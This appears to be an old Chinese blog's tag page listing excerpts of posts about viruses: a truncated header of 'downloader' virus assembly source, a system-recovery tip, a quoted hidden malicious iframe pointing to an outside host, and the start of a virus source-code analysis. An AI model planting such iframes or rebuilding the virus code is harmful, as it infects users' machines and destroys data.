Tag: 病毒预览模式: 普通 | 列表
08-06
25

(非原创)整理后的"下载者"病毒的代码

作者:Java伴侣  日期:2008-06-25

复制内容到剪贴板程序代码 程序代码
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 仿机器狗的感染文件代码
; by naitm(http://hi.baidu.com/naitm)
;
; ml /c /coff /nologo userinit.asm
; Link /align:0x10 /subsystem:windows /nologo userinit.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
        .386
        .model flat,stdcall

查看更多...

Tags: 下载者 病毒 木马

分类:Seo&Hacker | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 465
08-06
11

不能进入系统,找不到explorer.exe

作者:Java伴侣  日期:2008-06-11

   和病毒打了一仗,刚刚才恢复系统。下面讲一下吧,事情是这样地:上午开始我的电话速度就开始很慢,原以为是eclipse等软件开得太多,于是重启机器。(灾难来临了)此时我发现系统在加载完之后已经无法在正常模式下进入,遂进入安全模式杀毒。杀毒之后重启机器,发现安全模式也进不去了。此种进不去的现象仅停留在看不见桌面,鼠标无法捕捉到任何可执行软件。但是【ctrl】+【shift】+【Esc】,可以执行,任务管理器可以打开, 这样就可以新建一条任务了。接着继续启动杀毒软件把残留的机器狗干掉。接着允许explorer,心里祈祷着。。。(快还我桌面吧)但显示的却是无法找到explorer。这下愁坏我了,肯定是explorer感染上了病毒,被杀毒软件kill了。

接着尝试以下命令:
新建任务,输入
      
复制内容到剪贴板程序代码 程序代码
  cmd /k copy c:\windows\system32\dllcache\explorer.exe c:\windows
            (即复制explorer.exe从dllcache到c:\windows目录)

然后再新建任务运行explorer,就有了

其实话说回来,只是病毒没有感染到备份的explorer.exe。

查看更多...

Tags: 病毒

分类:Win&Linux | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1353
07-12
27

iframe病毒

作者:Java伴侣  日期:2007-12-27

中了“落雪”、“威金”、“熊猫烧香”病毒
<iframe src=http://qqq.aihengho.com/wm/jh.htm width=0 height=0></iframe>
有些符合“落雪”病毒的特征。
你的所有*.exe文件图标是否已被修改?
你的任务管理器里是否有新的可疑进程?
如果你有一款杀毒软件,就进入安全模式,全盘扫描杀毒。
如果你没有一款杀毒软件,建议安装微点主动防御软件(1.2.10569.0036):http://www.micropoint.com.cn/

查看更多...

Tags: iframe 病毒

分类:Seo&Hacker | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1116
07-10
20

爱国病毒技术简单分析 (源代码篇)

作者:Java伴侣  日期:2007-10-20

爱国病毒,专攻日本操作系统病毒技术简单分析:
江民公司截获了该病毒,并发布新闻:病毒作者留言呼吁阿扁下台 仿CIH病毒破坏分区表
http://www.jiangmin.com/News/jiangmin/index/important/20071015135432.htm

说真的,我不是这个病毒的作者,但我朋友的朋友的网友认识该病毒的作者,通过本人调查走访,软磨硬泡,终于把技术内幕告诉我了。具体是这样的。

首先,病毒运行的时候,会判断用户的操作系统,具体代码如下:
复制内容到剪贴板程序代码 程序代码
int GetSystemLanguage()
{

查看更多...

Tags: 爱国 病毒

分类:Seo&Hacker | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 1217